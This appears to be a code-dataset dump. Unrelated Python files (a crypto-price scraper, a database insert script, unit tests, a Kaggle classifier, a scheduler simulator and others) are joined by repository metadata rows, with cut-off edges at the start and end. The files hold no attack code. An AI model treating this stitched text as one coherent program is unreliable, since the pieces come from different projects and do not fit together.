result = pd.DataFrame(columns=['Crypto Currency', 'Market Cap', 'Circulating Supply', 'Max Supply',
'Vol (24H)', 'Todays Range', 'Chg (7D)', 'Currency'])
result.at[0, 'Crypto Currency'] = name
result.at[0, 'Currency'] = currency
if path_:
for elements_ in path_:
element = elements_.xpath(".//span[@class='title']")[0]
title_ = element.text_content().replace(':', '')
if title_ == "Day's Range":
title_ = 'Todays Range'
if title_ in result.columns.tolist():
result.at[0, title_] = element.getnext().text_content().strip()
result.replace({'N/A': None}, inplace=True)
if as_json is True:
json_ = result.iloc[0].to_dict()
return json_
elif as_json is False:
return result
else:
raise RuntimeError("ERR#0004: data retrieval error while scraping.")
def get_cryptos_overview(as_json=False, n_results=100):
"""
This function retrieves an overview containing all the real time data available for the main crypto currencies,
such as the names, symbols, current value, etc. as indexed in Investing.com. So on, the main usage of this
function is to get an overview on the main crypto currencies, so to get a general view. Note that since
this function is retrieving a lot of information at once, by default just the overview of the Top 100 crypto
currencies is being retrieved, but an additional parameter called n_results can be specified so to retrieve N results.
Args:
as_json (:obj:`bool`, optional):
optional argument to determine the format of the output data (:obj:`pandas.DataFrame` or :obj:`json`).
n_results (:obj:`int`, optional):
number of results to be displayed on the overview table (0-all_cryptos), where all crypto currencies will
be retrieved if n_results=None.
Note:
The amount of indexed crypto currencies may vary, so if n_results is set to `None`, all the available crypto
currencies in Investing while retrieving the overview, will be retrieved and returned.
Returns:
:obj:`pandas.DataFrame` - cryptos_overview:
The resulting :obj:`pandas.DataFrame` contains all the data available in Investing.com of the main crypto
currencies in order to get an overview of it.
If the retrieval process succeeded, the resulting :obj:`pandas.DataFrame` should look like::
name | symbol | price | market_cap | volume24h | total_volume | change24h | change7d | currency
-----|--------|-------|------------|-----------|--------------|-----------|----------|----------
xxxx | xxxxxx | xxxxx | xxxxxxxxxx | xxxxxxxxx | xxxxxxxxxxxx | xxxxxxxxx | xxxxxxxx | xxxxxxxx
Raises:
ValueError: raised if any of the introduced arguments is not valid or errored.
IOError: raised if data could not be retrieved due to file error.
RuntimeError: raised it no overview results could be retrieved from Investing.com.
ConnectionError: raised if GET requests does not return 200 status code.
"""
if not isinstance(as_json, bool):
raise ValueError("ERR#0002: as_json argument can just be True or False, bool type.")
if n_results is not None and not isinstance(n_results, int):
raise ValueError("ERR#0089: n_results argument should be an integer between 1 and 1000.")
if n_results is not None:
if 1 > n_results or n_results > 1000:
raise ValueError("ERR#0089: n_results argument should be an integer between 1 and 1000.")
header = {
"User-Agent": get_random(),
"X-Requested-With": "XMLHttpRequest",
"Accept": "text/html",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
}
url = "https://es.investing.com/crypto/currencies"
req = requests.get(url, headers=header)
root = fromstring(req.text)
table = root.xpath(".//table[contains(@class, 'allCryptoTlb')]/tbody/tr")
results = list()
flag = False
if len(table) > 0:
if n_results is not None and n_results <= 100:
table = table[:n_results]
flag = True
for row in table:
name = row.xpath(".//td[contains(@class, 'elp')]")[0].text_content().strip()
symbol = row.xpath(".//td[contains(@class, 'symb')]")[0].get('title').strip()
price = row.xpath(".//td[contains(@class, 'price')]")[0].text_content()
market_cap = row.xpath(".//td[@class='js-market-cap']")[0].get('data-value')
volume24h = row.xpath(".//td[@class='js-24h-volume']")[0].get('data-value')
total_volume = row.xpath(".//td[@class='js-total-vol']")[0].text_content()
change24h = row.xpath(".//td[contains(@class, 'js-currency-change-24h')]")[0].text_content()
change7d = row.xpath(".//td[contains(@class, 'js-currency-change-7d')]")[0].text_content()
data = {
"name": name,
"symbol": symbol,
"price": float(price.replace(',', '')),
"market_cap": float(market_cap.replace(',', '')),
"volume24h": volume24h,
"total_volume": total_volume,
"change24h": change24h,
"change7d": change7d,
"currency": "USD"
}
results.append(data)
else:
raise RuntimeError("ERR#0092: no data found while retrieving the overview from Investing.com")
if flag is True:
df = pd.DataFrame(results)
if as_json:
return json.loads(df.to_json(orient='records'))
else:
return df
else:
header = {
"User-Agent": get_random(),
"X-Requested-With": "XMLHttpRequest",
"Accept": "text/html",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
}
params = {
'lastRowId': 100
}
url = 'https://www.investing.com/crypto/Service/LoadCryptoCurrencies'
req = requests.post(url=url, headers=header, data=params)
root = fromstring(req.json()['html'])
table = root.xpath(".//tr")
if n_results is not None:
remaining_cryptos = n_results - len(results)
table = table[:remaining_cryptos]
if len(table) > 0:
for row in table:
name = row.xpath(".//td[contains(@class, 'elp')]")[0].text_content().strip()
symbol = row.xpath(".//td[contains(@class, 'symb')]")[0].get('title').strip()
price = row.xpath(".//td[contains(@class, 'price')]")[0].text_content()
market_cap = row.xpath(".//td[@class='js-market-cap']")[0].get('data-value')
volume24h = row.xpath(".//td[@class='js-24h-volume']")[0].get('data-value')
total_volume = row.xpath(".//td[@class='js-total-vol']")[0].text_content()
change24h = row.xpath(".//td[contains(@class, 'js-currency-change-24h')]")[0].text_content()
change7d = row.xpath(".//td[contains(@class, 'js-currency-change-7d')]")[0].text_content()
data = {
"name": name,
"symbol": symbol,
"price": float(price.replace(',', '')),
"market_cap": float(market_cap.replace(',', '')),
"volume24h": volume24h,
"total_volume": total_volume,
"change24h": change24h,
"change7d": change7d,
"currency": "USD"
}
results.append(data)
else:
raise RuntimeError("ERR#0092: no data found while retrieving the overview from Investing.com")
df = pd.DataFrame(results)
if as_json:
return json.loads(df.to_json(orient='records'))
else:
return df
def search_cryptos(by, value):
"""
This function searches cryptos by the introduced value for the specified field. This means that this function
is going to search if there is a value that matches the introduced one for the specified field which is the
`cryptos.csv` column name to search in. Available fields to search cryptos are 'name' and 'symbol'.
Args:
by (:obj:`str`): name of the field to search for, which is the column name which can be: 'name' or 'symbol'.
value (:obj:`str`): value of the field to search for, which is the value that is going to be searched.
Returns:
:obj:`pandas.DataFrame` - search_result:
The resulting :obj:`pandas.DataFrame` contains the search results from the given query, which is
any match of the specified value in the specified field. If there are no results for the given query,
an error will be raised, but otherwise the resulting :obj:`pandas.DataFrame` will contain all the
available cryptos that match the introduced query.
Raises:
ValueError: raised if any of the introduced parameters is not valid or errored.
FileNotFoundError: raised if `cryptos.csv` file is missing.
IOError: raised if data could not be retrieved due to file error.
RuntimeError: raised if no results were found for the introduced value in the introduced field.
"""
if not by:
raise ValueError('ERR#0006: the introduced field to search is mandatory and should be a str.')
if not isinstance(by, str):
raise ValueError('ERR#0006: the introduced field to search is mandatory and should be a str.')
if not value:
raise ValueError('ERR#0017: the introduced value to search is mandatory and should be a str.')
if not isinstance(value, str):
raise ValueError('ERR#0017: the introduced value to search is mandatory and should be a str.')
resource_package = 'investpy'
resource_path = '/'.join(('resources', 'crypto', 'cryptos.csv'))
if pkg_resources.resource_exists(resource_package, resource_path):
cryptos = pd.read_csv(pkg_resources.resource_filename(resource_package, resource_path))
else:
raise FileNotFoundError("ERR#0081: cryptos file not found or errored.")
if cryptos is None:
raise IOError("ERR#0082: cryptos not found or unable to retrieve.")
cryptos.drop(columns=['tag', 'id'], inplace=True)
available_search_fields = cryptos.columns.tolist()
if isinstance(by, str) and by not in available_search_fields:
raise ValueError('ERR#0026: the introduced field to search can either just be '
+ ' or '.join(available_search_fields))
cryptos['matches'] = cryptos[by].str.contains(value, case=False)
search_result = cryptos.loc[cryptos['matches'] == True].copy()
if len(search_result) == 0:
raise RuntimeError('ERR#0043: no results were found for the introduced ' + str(by) + '.')
search_result.drop(columns=['matches'], inplace=True)
search_result.reset_index(drop=True, inplace=True)
return search_result
| [
"alvarob96@usal.es"
] | alvarob96@usal.es |
dfd98191175a3dd95b1c3ae9ce0834fff3628057 | 99a1b01baed66d3e7ab7c26b1eb8d5832421634b | /db/dbInsert/insertDarwin_Ocean_Color_bcp.py | 819ac4b1bd08f7680ed2d089e9afdd302bebf900 | [] | no_license | mdashkezari/opedia | 011f4d358b1f860ec51cca408c3af9368e036868 | 1e82ae66baedad721c41182f0586fa2a867291c2 | refs/heads/master | 2021-05-09T11:24:18.126622 | 2019-09-12T20:24:06 | 2019-09-12T20:24:06 | 118,988,572 | 9 | 8 | null | 2019-09-11T19:54:30 | 2018-01-26T01:22:55 | HTML | UTF-8 | Python | false | false | 1,147 | py |
import sys
sys.path.append('../')
import insertFunctions as iF
import insertPrep as ip
import config_vault as cfgv
import pandas as pd
import io
import numpy as np
import glob
import xarray as xr
import os.path
############################
########### OPTS ###########
tableName = 'tblDarwin_Ocean_Color'
rawFilePath = '/media/nrhagen/Drobo/OpediaVault/model/darwin_Ocean_Color/rep/'
netcdf_list = glob.glob(rawFilePath + '*.nc')
exportBase = cfgv.opedia_proj + 'db/dbInsert/export_temp/'
prefix = tableName
export_path = '%s%s.csv' % (exportBase, prefix)
############################
############################
processed_csv_list = glob.glob(rawFilePath + '*darwin_v0.2_cs510_ocean_color*.csv*')
sorted_csvlist = np.sort(processed_csv_list).tolist()
for sorted_csv in sorted_csvlist:
if os.path.isfile(sorted_csv[:-3] + '_BCP.txt'):
print(sorted_csv[:-4] + ' already inserted into db. Passing')
pass
else:
print('Inserting ' + sorted_csv[:-4] + ' into db')
iF.toSQLbcp(sorted_csv, tableName)
file = open(exportBase + os.path.basename(sorted_csv)[:-3] + '_BCP.txt', "w")
file.close()
| [
"norlandrhagen@gmail.com"
] | norlandrhagen@gmail.com |
27bd80225a47293e5ddca228a1de1c72096f45d8 | 15a3297d6aeb8d8258127a19540c2583c9fc81d1 | /tests/test_array_ops.py | ffb529d419ef0280c913c6b54067c7c9f7d65b88 | [] | no_license | RW74/htm-tensorflow | b6fffcb5e69e05b150a261ab44685c22f72cdc4e | 7baebdd7df393a7f1badee36c97aea36b35913b0 | refs/heads/master | 2020-04-29T08:00:38.308477 | 2019-02-21T07:05:17 | 2019-02-21T07:05:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 552 | py | from htmtorch.testing.torchtest import TorchTestCase
from htmtorch.functional.array_ops import array_to_nd_index
import torch as tor
class TestArrayOps(TorchTestCase):
def test_basic_cuda(self):
ind = tor.LongTensor([110, 125, 235, 333, 404]).cuda()
nd_shape = tor.LongTensor([10, 10, 10]).cuda()
xy = array_to_nd_index(ind, nd_shape)
result = [[1, 1, 0],
[1, 2, 5],
[2, 3, 5],
[3, 3, 3],
[4, 0, 4]]
self.assertTensorEqual(result, xy)
| [
"josh.miklos@gmail.com"
] | josh.miklos@gmail.com |
20e46df06810abb0fa2b20f57e6b1d069dc6f7cf | 3ae6dc36775925a9a029cdb39788e30e20882028 | /tests/structures/test_interface.py | 6fd7f17584eb3cd27d3198d573ab83c87022c614 | [
"BSD-3-Clause"
] | permissive | rubacalypse/voc | 89939b63596cb1ada2cdc06463d1bb527ef5099e | 485b698247e49ac7bc58c18839d21556018e16a9 | refs/heads/master | 2021-01-18T07:36:34.361276 | 2016-01-03T18:05:27 | 2016-01-03T18:05:27 | 48,055,448 | 0 | 0 | null | 2015-12-15T16:29:37 | 2015-12-15T16:29:36 | null | UTF-8 | Python | false | false | 1,183 | py | from ..utils import TranspileTestCase
class InterfaceTests(TranspileTestCase):
def test_implement_interface(self):
"You can implement (and use) a native Java interface"
self.assertJavaExecution(
"""
from java.lang import StringBuilder
class MyStringAnalog(implements=java.lang.CharSequence):
def __init__(self, value):
self.value = value
def charAt(self, index: int) -> char:
return 'x'
def length(self) -> int:
return len(self.value)
def subSequence(self, start: int, end: int) -> java.lang.CharSequence:
return MyStringAnalog(self.value[start:end])
def toString(self) -> java.lang.String:
return self.value
analog = MyStringAnalog("world")
builder = StringBuilder()
builder.append("Hello, ")
builder.append(analog)
print(builder)
print("Done.")
""",
"""
Hello, world
Done.
""", run_in_function=False)
| [
"russell@keith-magee.com"
] | russell@keith-magee.com |
c49c7b30a213953338bacae13bce7542fc685473 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03250/s058422240.py | 419fcf62181f60fc0b7561718d452826ac4f13c6 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | L=sorted(list(map(str,input().split())))
print(int(L[2]+L[1])+int(L[0]))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
cb9bd6a54a31181beeb644511e54151a4fee2fe1 | 1c8bcd2d8e129a92e3328f47d2a452814c033327 | /kaggle/ghouls-goblins-and-ghosts-boo/script_1.py | e347cb42aa2a26bcc394a0ab838bc06f91aabe72 | [
"MIT"
] | permissive | josepablocam/janus-public | 425334706f9a4519534779b7f089262cf5cf0dee | 4713092b27d02386bdb408213d8edc0dc5859eec | refs/heads/main | 2023-03-08T15:21:12.461762 | 2021-02-25T20:53:02 | 2021-02-25T20:53:02 | 314,606,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,797 | py | # Import the required libraries
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from matplotlib import pyplot as plt
import seaborn as sns
from sklearn import preprocessing
from sklearn import metrics
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import VotingClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import BaggingClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
import warnings
warnings.filterwarnings("ignore")
train_data_orig = pd.read_csv('../input/train.csv')
test_data_orig = pd.read_csv('../input/test.csv')
print("Shape of Training Data")
print(train_data_orig.shape)
print("\n")
print("Shape of Testing Data")
print(test_data_orig.shape)
print("Columns in Training Data")
print(train_data_orig.columns)
print("\n")
print("Columns in Testing Data")
print(test_data_orig.columns)
train_data_orig.info()
train_data_orig.head()
train_data = train_data_orig.drop(['id'], axis = 1)
test_data = test_data_orig.drop(['id'], axis = 1)
train_data.describe()
test_data.describe()
print(np.sort(train_data['color'].unique()))
print(np.sort(test_data['color'].unique()))
print(np.sort(train_data['type'].unique()))
# Use LabelEncoder for the 'color' feature
color_le = preprocessing.LabelEncoder()
color_le.fit(train_data['color'])
train_data['color_int'] = color_le.transform(train_data['color'])
_ = sns.pairplot(train_data.drop('color', axis = 1), hue = 'type', palette = 'muted', diag_kind='kde')
train_data.drop('color_int', axis = 1, inplace = True)
_ = sns.heatmap(train_data.corr(), annot = True, fmt = ".2f", cmap = 'YlGnBu')
g = sns.FacetGrid(pd.melt(train_data, id_vars='type', value_vars = ['bone_length', 'rotting_flesh', 'hair_length', 'has_soul']), col = 'type')
g = g.map(sns.boxplot, 'value', 'variable', palette = 'muted')
df = pd.get_dummies(train_data.drop('type', axis = 1))
X_train, X_test, y_train, y_test = train_test_split(df, train_data['type'], test_size = 0.25, random_state = 0)
dt_clf = DecisionTreeClassifier(random_state = 0)
dt_clf.fit(X_train, y_train)
y_pred = dt_clf.predict(X_test)
print(metrics.classification_report(y_test, y_pred))
print("\nAccuracy Score is: " + str(metrics.accuracy_score(y_test, y_pred)))
accuracy_scorer = metrics.make_scorer(metrics.accuracy_score)
X_train = pd.get_dummies(train_data.drop('type', axis = 1))
y_train = train_data['type']
X_test = pd.get_dummies(test_data)
params = {'n_estimators':[10, 20, 50, 100], 'criterion':['gini', 'entropy'], 'max_depth':[None, 5, 10, 25, 50]}
rf = RandomForestClassifier(random_state = 0)
clf = GridSearchCV(rf, param_grid = params, scoring = accuracy_scorer, cv = 5, n_jobs = -1)
clf.fit(X_train, y_train)
print('Best score: {}'.format(clf.best_score_))
print('Best parameters: {}'.format(clf.best_params_))
rf_best = RandomForestClassifier(n_estimators = 10, random_state = 0)
params = {'n_estimators':[10, 25, 50, 100], 'max_samples':[1, 3, 5, 10]}
bag = BaggingClassifier(random_state = 0)
clf = GridSearchCV(bag, param_grid = params, scoring = accuracy_scorer, cv = 5, n_jobs = -1)
clf.fit(X_train, y_train)
print('Best score: {}'.format(clf.best_score_))
print('Best parameters: {}'.format(clf.best_params_))
bag_best = BaggingClassifier(max_samples = 5, n_estimators = 25, random_state = 0)
params = {'learning_rate':[0.05, 0.1, 0.5], 'n_estimators':[100, 200, 500], 'max_depth':[2, 3, 5, 10]}
gbc = GradientBoostingClassifier(random_state = 0)
clf = GridSearchCV(gbc, param_grid = params, scoring = accuracy_scorer, cv = 5, n_jobs = -1)
clf.fit(X_train, y_train)
print('Best score: {}'.format(clf.best_score_))
print('Best parameters: {}'.format(clf.best_params_))
gbc_best = GradientBoostingClassifier(learning_rate = 0.1, max_depth = 5, n_estimators = 100, random_state = 0)
params = {'n_neighbors':[3, 5, 10, 20], 'leaf_size':[20, 30, 50], 'p':[1, 2, 5], 'weights':['uniform', 'distance']}
knc = KNeighborsClassifier()
clf = GridSearchCV(knc, param_grid = params, scoring = accuracy_scorer, cv = 5, n_jobs = -1)
clf.fit(X_train, y_train)
print('Best score: {}'.format(clf.best_score_))
print('Best parameters: {}'.format(clf.best_params_))
knc_best = KNeighborsClassifier(n_neighbors = 10)
params = {'penalty':['l1', 'l2'], 'C':[1, 2, 3, 5, 10]}
lr = LogisticRegression(random_state = 0)
clf = GridSearchCV(lr, param_grid = params, scoring = accuracy_scorer, cv = 5, n_jobs = -1)
clf.fit(X_train, y_train)
print('Best score: {}'.format(clf.best_score_))
print('Best parameters: {}'.format(clf.best_params_))
lr_best = LogisticRegression(penalty = 'l1', C = 1, random_state = 0)
params = {'kernel':['linear', 'rbf'], 'C':[1, 3, 5, 10], 'degree':[3, 5, 10]}
svc = SVC(probability = True, random_state = 0)
clf = GridSearchCV(svc, param_grid = params, scoring = accuracy_scorer, cv = 5, n_jobs = -1)
clf.fit(X_train, y_train)
print('Best score: {}'.format(clf.best_score_))
print('Best parameters: {}'.format(clf.best_params_))
svc_best = SVC(C = 10, degree = 3, kernel = 'linear', probability = True, random_state = 0)
voting_clf = VotingClassifier(estimators=[('rf', rf_best), ('bag', bag_best), ('gbc', gbc_best), ('lr', lr_best), ('svc', svc_best)]
, voting='hard')
voting_clf.fit(X_train, y_train)
y_pred = voting_clf.predict(X_test)
print("\nAccuracy Score for VotingClassifier is: " + str(voting_clf.score(X_train, y_train)))
submission = pd.DataFrame({'id':test_data_orig['id'], 'type':y_pred})
submission.to_csv('../working/submission.csv', index=False)
| [
"jcamsan@mit.edu"
] | jcamsan@mit.edu |
3c6ef5ab0efd64646da6bb20b1a0a4dbe7ed9d52 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03427/s581758715.py | e0f6f58c743a818c6bcf68751f6112a9ffbc4167 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 157 | py | N = input().strip()
k = len(N)
cmax = 0
for i in range(k):
cmax += int(N[i])
if k>1:
cnt = (int(N[0])-1)+9*(k-1)
cmax = max(cmax,cnt)
print(cmax) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
024d7c9d22a9d10759f9603ccacb53f3aac364fd | 0104add04cd6da515e2ccb2c27e44bc6693f9bcf | /Yurii_Khomych/l_1_functions/currying_2.py | c3cd7ebafac18d91b79596981f4c1728f815323c | [] | no_license | YuriiKhomych/ITEA-advanced | c96c3cf9b279caf62fefcd41faf543cee7534626 | 90bc47733c07b5b866aa3a14aa12a169f5df289c | refs/heads/master | 2022-12-09T20:38:23.607426 | 2019-12-22T17:30:59 | 2019-12-22T17:30:59 | 209,354,034 | 0 | 9 | null | 2022-12-08T03:04:04 | 2019-09-18T16:23:12 | Python | UTF-8 | Python | false | false | 854 | py |
def change(func_1, func_2, func_3):
def inner_func(arg):
return func_1(func_2(func_3(arg)))
return inner_func
def kilometer2meter(dist):
""" Function that converts km to m. """
return dist * 1000
def meter2centimeter(dist):
""" Function that converts m to cm. """
return dist * 100
def centimeter2feet(dist):
""" Function that converts cm to ft. """
return dist / 30.48
kilometer2meter_result = kilometer2meter(565)
meter2centimeter_result = meter2centimeter(kilometer2meter_result)
centimeter2feet_result = centimeter2feet(meter2centimeter_result)
centimeter2feet_result = centimeter2feet(meter2centimeter(kilometer2meter(565)))
transform = change(centimeter2feet, meter2centimeter, kilometer2meter)
e = transform(565)
print(e)
result = change(centimeter2feet, meter2centimeter, kilometer2meter)(565)
| [
"yuriykhomich@gmail.com"
] | yuriykhomich@gmail.com |
f2061a6cc57c32db6bff0cdc2dfda4b0d2a2a292 | 5d027f4d32fc503212a824355ef45295e6df90b5 | /Homework/HW-Scheduler/HW-Scheduler/scheduler.py | 59e134b93c656a04b20b187861469354df0c6331 | [] | no_license | M1c17/OP_three_easy_steps | c99fa0a9214e42e8b44df14e84125c034b9cb1f3 | ea6190c55358d027169e7911bebd7aa6f2b56dff | refs/heads/master | 2022-12-18T22:25:52.055978 | 2020-09-15T03:10:19 | 2020-09-15T03:10:19 | 295,588,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,799 | py | #! /usr/bin/env python
import sys
from optparse import OptionParser
import random
parser = OptionParser()
parser.add_option("-s", "--seed", default=0, help="the random seed",
action="store", type="int", dest="seed")
parser.add_option("-j", "--jobs", default=3, help="number of jobs in the system",
action="store", type="int", dest="jobs")
parser.add_option("-l", "--jlist", default="", help="instead of random jobs, provide a comma-separated list of run times",
action="store", type="string", dest="jlist")
parser.add_option("-m", "--maxlen", default=10, help="max length of job",
action="store", type="int", dest="maxlen")
parser.add_option("-p", "--policy", default="FIFO", help="sched policy to use: SJF, FIFO, RR",
action="store", type="string", dest="policy")
parser.add_option("-q", "--quantum", help="length of time slice for RR policy", default=1,
action="store", type="int", dest="quantum")
parser.add_option("-c", help="compute answers for me", action="store_true", default=False, dest="solve")
(options, args) = parser.parse_args()
random.seed(options.seed)
print('ARG policy', options.policy)
if options.jlist == '':
print('ARG jobs', options.jobs)
print('ARG maxlen', options.maxlen)
print('ARG seed', options.seed)
else:
print('ARG jlist', options.jlist)
print('')
print('Here is the job list, with the run time of each job: ')
import operator
joblist = []
if options.jlist == '':
for jobnum in range(0,options.jobs):
runtime = int(options.maxlen * random.random()) + 1
joblist.append([jobnum, runtime])
print(' Job', jobnum, '( length = ' + str(runtime) + ' )')
else:
jobnum = 0
for runtime in options.jlist.split(','):
joblist.append([jobnum, float(runtime)])
jobnum += 1
for job in joblist:
print(' Job', job[0], '( length = ' + str(job[1]) + ' )')
print('\n')
if options.solve == True:
print('** Solutions **\n')
if options.policy == 'SJF':
joblist = sorted(joblist, key=operator.itemgetter(1))
options.policy = 'FIFO'
if options.policy == 'FIFO':
thetime = 0
print('Execution trace:')
for job in joblist:
print(' [ time %3d ] Run job %d for %.2f secs ( DONE at %.2f )' % (thetime, job[0], job[1], thetime + job[1]))
thetime += job[1]
print('\nFinal statistics:')
t = 0.0
count = 0
turnaroundSum = 0.0
waitSum = 0.0
responseSum = 0.0
for tmp in joblist:
jobnum = tmp[0]
runtime = tmp[1]
response = t
turnaround = t + runtime
wait = t
print(' Job %3d -- Response: %3.2f Turnaround %3.2f Wait %3.2f' % (jobnum, response, turnaround, wait))
responseSum += response
turnaroundSum += turnaround
waitSum += wait
t += runtime
count = count + 1
print('\n Average -- Response: %3.2f Turnaround %3.2f Wait %3.2f\n' % (responseSum/count, turnaroundSum/count, waitSum/count))
if options.policy == 'RR':
print('Execution trace:')
turnaround = {}
response = {}
lastran = {}
wait = {}
quantum = float(options.quantum)
jobcount = len(joblist)
for i in range(0,jobcount):
lastran[i] = 0.0
wait[i] = 0.0
turnaround[i] = 0.0
response[i] = -1
runlist = []
for e in joblist:
runlist.append(e)
thetime = 0.0
while jobcount > 0:
# print '%d jobs remaining' % jobcount
job = runlist.pop(0)
jobnum = job[0]
runtime = float(job[1])
if response[jobnum] == -1:
response[jobnum] = thetime
currwait = thetime - lastran[jobnum]
wait[jobnum] += currwait
if runtime > quantum:
runtime -= quantum
ranfor = quantum
print(' [ time %3d ] Run job %3d for %.2f secs' % (thetime, jobnum, ranfor))
runlist.append([jobnum, runtime])
else:
ranfor = runtime;
print(' [ time %3d ] Run job %3d for %.2f secs ( DONE at %.2f )' % (thetime, jobnum, ranfor, thetime + ranfor))
turnaround[jobnum] = thetime + ranfor
jobcount -= 1
thetime += ranfor
lastran[jobnum] = thetime
print('\nFinal statistics:')
turnaroundSum = 0.0
waitSum = 0.0
responseSum = 0.0
for i in range(0,len(joblist)):
turnaroundSum += turnaround[i]
responseSum += response[i]
waitSum += wait[i]
print(' Job %3d -- Response: %3.2f Turnaround %3.2f Wait %3.2f' % (i, response[i], turnaround[i], wait[i]))
count = len(joblist)
print('\n Average -- Response: %3.2f Turnaround %3.2f Wait %3.2f\n' % (responseSum/count, turnaroundSum/count, waitSum/count))
if options.policy != 'FIFO' and options.policy != 'SJF' and options.policy != 'RR':
print('Error: Policy', options.policy, 'is not available.')
sys.exit(0)
else:
print('Compute the turnaround time, response time, and wait time for each job.')
print('When you are done, run this program again, with the same arguments,')
print('but with -c, which will thus provide you with the answers. You can use')
print('-s <somenumber> or your own job list (-l 10,15,20 for example)')
print('to generate different problems for yourself.')
print('')
| [
"pictor117@gmail.com"
] | pictor117@gmail.com |
f940347b0a46dad50d1d229095586c5651621a8f | 397e125e94f4f139f2bf5055824d81f24b8b1757 | /ABC/138/E.py | 90a94533e38572141fe743f2f69457c94250fa59 | [] | no_license | tails1434/Atcoder | ecbab6ee238e3f225551297db961b1b502841fa4 | e7c7fed36be46bbaaf020a70997842240ba98d62 | refs/heads/master | 2021-07-07T00:31:49.235625 | 2020-09-30T01:42:01 | 2020-09-30T01:42:01 | 189,009,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | from collections import defaultdict
from bisect import bisect_right
def main():
S = input()
T = input()
d = defaultdict(list)
for i, s in enumerate(S):
d[s].append(i+1)
pre = 0
cnt = 0
loop = 0
len_S = len(S)
for t in T:
if not d[t]:
print(-1)
exit()
index = bisect_right(d[t],pre)
if index > len(d[t])-1:
pre = 0
loop += 1
index = bisect_right(d[t],pre)
pre = d[t][index]
ans = loop * len_S + pre
print(ans)
if __name__ == "__main__":
main() | [
"sososo1333@gmail.com"
] | sososo1333@gmail.com |
dbd2baaba12c468d6326baad9fc89420ad6d9071 | 388556baa0c2ee53d8767ae8a4bce18c03124488 | /Chapter11/0017_difference_between_abstraction_encapsulation.py | 0a946d6f97028efc1ea5384b7d8c3e1eb976d848 | [] | no_license | 8563a236e65cede7b14220e65c70ad5718144a3/introduction-python-programming-solutions | 6e2e7c8cf8babc3c63f75d8d5e987f4dbc018269 | f21d70ae2062cc2d5d3a2fefce81a2a3b4ea3bfd | refs/heads/master | 2022-12-10T04:24:56.364629 | 2020-07-01T11:34:01 | 2020-07-01T11:34:01 | 294,878,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 328 | py | """
Program 11.13
Demonstrate the Difference between Abstraction and Encapsulation
"""
class foo:
def __init__(self, a, b):
self.a = a
self.b = b
def add(self):
return self.a + self.b
def main():
foo_object = foo(3, 4)
print(foo_object.add())
if __name__ == "__main__":
main()
| [
"warren.jitsing@gmail.com"
] | warren.jitsing@gmail.com |
9af8fb8a7ef155427b16305335e2b3c950d6b53b | 61050d0d7f0c0a60474e4e85d30be4e5ea7c6b04 | /content/components/dom-access/job.odb | 3c76a64ef3a81dd1ef07fb2572060e156f42bdc7 | [] | no_license | danse-inelastic/vnf | 8173f06f32b4a2fa2b71fddfe0fecf9c19e05e9a | be989448577f14f424aca4ce852c7198304ca57b | refs/heads/master | 2021-01-22T01:06:00.294100 | 2015-05-02T23:25:45 | 2015-05-02T23:25:45 | 34,947,878 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,779 | odb | # -*- Python -*-
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Jiao Lin
# California Institute of Technology
# (C) 2006-2009 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from vnf.components.DOMAccessor import DOMAccessor as base
class Accessor(base):
def __init__(self):
super(Accessor, self).__init__('job')
return
def _getOrm(self):
orm = self.director.clerk.orm
# job depends on computation, let us just reuse orm initialization from computation
self.director.retrieveDOMAccessor('computation').orm
return orm
orm = property(_getOrm)
def getJobRecord(self, id):
# make sure orm is initd
orm = self.orm
#
return self.getRecordByID(JobTable, id)
def getJobLabel(self, id):
r = self.getJobRecord(id)
t = 'Job %s' % id
if r.short_description:
t += '(%s)' % r.short_description
return t
def resetJob(self, id):
"reset job to 'initial' status, which allows someone to resubmit the job"
r = self.getJobRecord(id)
db = self.db
# itasks
from vnf.dom.ITask import ITask
tasks = r.getReferences(db, ITask, 'beneficiary')
for task in tasks:
task.state = 'failed'
db.updateRecord(task)
continue
# job itself
r.state = 'submissionfailed'
db.updateRecord(r)
# also reset the computation so that the job retrieval looks like failed
computation = r.computation.dereference(db)
domaccess = self.director.retrieveDOMAccessor('computation')
domaccess.resetResultRetrievalTask(
type=computation.getTableName(),
id=computation.id)
return
def countJobs(self, filter=None, label=None, mine=False):
